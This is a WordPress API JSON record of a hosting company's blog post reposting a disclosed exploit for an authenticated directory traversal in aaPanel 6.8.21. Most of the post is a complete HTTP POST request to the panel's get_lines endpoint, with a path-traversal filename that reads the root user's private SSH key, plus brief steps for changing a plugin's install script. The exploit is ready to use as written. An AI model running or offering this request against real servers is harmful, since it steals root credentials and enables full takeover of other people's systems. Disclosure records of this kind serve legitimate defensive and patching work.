{"id":21034,"date":"2022-02-23T18:59:01","date_gmt":"2022-02-23T15:59:01","guid":{"rendered":"https:\/\/packetstormsecurity.com\/files\/166111\/aapanel6821-traversal.txt"},"modified":"2022-02-28T10:51:47","modified_gmt":"2022-02-28T07:21:47","slug":"aapanel-6-8-21-directory-traversal","status":"publish","type":"post","link":"https:\/\/afaghhosting.net\/blog\/aapanel-6-8-21-directory-traversal\/","title":{"rendered":"aaPanel 6.8.21 Directory Traversal"},"content":{"rendered":"<p dir=\"ltr\"># Exploit Title: aaPanel 6.8.21 &#8211; Directory Traversal (Authenticated)<br \/>\n# Date: 22.02.2022<br \/>\n# Exploit Author: Fikrat Ghuliev (Ghuliev)<br \/>\n# Vendor Homepage: https:\/\/www.aapanel.com\/<br \/>\n# Software Link: https:\/\/www.aapanel.com<br \/>\n# Version: 6.8.21<br \/>\n# Tested on: Ubuntu<\/p>\n<p dir=\"ltr\">Application vulnerable to Directory Traversal and attacker can get root user private ssh key(id_rsa)<\/p>\n<p dir=\"ltr\">#Go to App Store<\/p>\n<p dir=\"ltr\">#Click to &#8220;install&#8221; in any free plugin.<\/p>\n<p dir=\"ltr\">#Change installation script to ..\/..\/..\/root\/.ssh\/id_rsa<\/p>\n<p dir=\"ltr\">POST \/ajax?action=get_lines HTTP\/1.1<br \/>\nHost: IP:7800<br \/>\nContent-Length: 41<br \/>\nAccept: *\/*<br \/>\nX-Requested-With: XMLHttpRequest<br \/>\nUser-Agent: Mozilla\/5.0 (Windows NT 10.0; Win64; x64)<br \/>\nAppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/98.0.4758.82<br \/>\nSafari\/537.36<br \/>\nContent-Type: application\/x-www-form-urlencoded; charset=UTF-8<br \/>\nOrigin: http:\/\/IP:7800<br \/>\nReferer: http:\/\/IP:7800\/soft<br \/>\nAccept-Encoding: gzip, deflate<br \/>\nAccept-Language: en-US,en;q=0.9<br \/>\nCookie: aa0775f98350c5c13bfd21f2c6b8c288=d20c4937-e5ae-46fb-b8bd-fa7c290d805a.ohyRHdOIMj3DBfyddCRbL-rlKB0;<br \/>\nrequest_token=nKLXa4RUXgwBHeWNyMH1MEDSkTaks9dWjQ7zzA0iRc7lrHwd;<br \/>\nserverType=nginx; order=id%20desc; memSize=3889; vcodesum=13;<br \/>\npage_number=20; backup_path=\/www\/backup; sites_path=\/www\/wwwroot;<br \/>\ndistribution=ubuntu; serial_no=; pro_end=-1; load_page=null;<br \/>\nload_type=null; load_search=undefined; force=0; rank=list;<br \/>\nPath=\/www\/wwwroot; bt_user_info=; default_dir_path=\/www\/wwwroot\/;<br \/>\npath_dir_change=\/www\/wwwroot\/<br \/>\nConnection: close<\/p>\n<p dir=\"ltr\">num=10&amp;filename=..\/..\/..\/root\/.ssh\/id_rsa<\/p>\n","protected":false},"excerpt":{"rendered":"<p># Exploit Title: aaPanel 6.8.21 &#8211; Directory Traversal (Authenticated) # Date: 22.02.2022 # Exploit Author: Fikrat Ghuliev (Ghuliev) # Vendor Homepage: https:\/\/www.aapanel.com\/ # Software Link: https:\/\/www.aapanel.com # Version: 6.8.21 # Tested on: Ubuntu Application vulnerable to Directory Traversal and attacker can get root user private ssh key(id_rsa) #Go to App Store #Click to &#8220;install&#8221; in &hellip;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[26],"tags":[],"class_list":["post-21034","post","type-post","status-publish","format-standard","hentry","category-vulnerability"],"_links":{"self":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/21034","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/comments?post=21034"}],"version-history":[{"count":0,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/21034\/revisions"}],"wp:attachment":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/media?parent=21034"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/categories?post=21034"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/tags?post=21034"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}